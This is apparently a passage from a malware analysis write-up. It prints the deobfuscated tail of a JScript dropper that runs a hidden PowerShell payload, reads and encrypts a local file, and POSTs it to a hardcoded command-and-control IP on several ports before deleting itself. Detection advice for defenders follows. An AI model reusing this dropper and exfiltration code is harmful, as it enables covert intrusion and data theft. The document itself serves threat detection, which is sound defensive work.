"oc06"; var botSufx = "_oOG4DHP3g"; var kkid = "203"; var alfIn = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; var alfOut = "Dt4bzk9T0fOQVvo2Mw1JgnZR5PhFaBG3cYWiUAjHNIdXCql8rspSLEuy7x6mKe"; var sepr = "%SEPR%"; var botId = cuid() + botSufx; botId = vers + "-" + uuid + "-" + com_pref + "-" + botId; var urlArr = []; urlArr[0] = "http://31.148.220.215:80/cd"; urlArr[1] = "http://31.148.220.215:443/cd"; urlArr[2] = "http://31.148.220.215:8080/cd"; urlArr[3] = "http://31.148.220.215:53/cd"; urlArr[4] = "google.com"; pausecomp( 2 * 60 * 1000 ); var f = fso.OpenTextFile(p,2,1); f.Write( b64dec(PS1Body) ); f.Close(); cmd = powershell_pthpath + ' -version 2.0 -NoP -NonI -ExecutionPolicy Bypass -WindowStyle Hidden -File "' + p + '"'; sh.Run(cmd, 0, false); pausecomp( 5 * 60 * 1000 ); try{ fso.DeleteFile(p, true); }catch(e){} var usrName = sh.ExpandEnvironmentStrings("%USERNAME%"); p = sh.ExpandEnvironmentStrings("%APPDATA%") + "\\" + usrName + ".ini"; var outData = readFile(p); try{ fso.DeleteFile(p, true); }catch(e){} var contentsHtml = ""; outData = b64enc(outData); outData = "stels" + sepr + outData; var entry = randomParamName(); var v = encodeURI(SimpleEncrypt(outData)) contentsHtml = downLoadUrl("POST", urlArr, randomUrl(botId), entry + "=" + v); fso.DeleteFile(WScript.ScriptFullName, true); }catch(e){} */}).toString().slice(16,-4); try { lalala(); } catch(e) { eval(evalString); }
The payload is dropped from the IP 31.148.220.215/cd as can be seen in the script above.
To detect this threat, as it has a very unique Schedule Task, can be detected checking all the schedule tasks with the string "user\", where the maliciuos script is allocated. For example, the following PowerShell command could be executed with a script across different system
What other useful Use Cases can be used to detect this threat?
Any JS script executed using a TXT file is an anormal behaviour, for example:
Any Wscript command spawing PowerShell
Any created schedule tasks which uses a file from a user directory
The technique of embedding malicious code in office document via OLE objects is not new at all. Monitoring the processes created by office applications or WScript commands executed is a good source of spotting malicious activity. The schedule tasks in user space is also a good source of potential maliciuos activity.
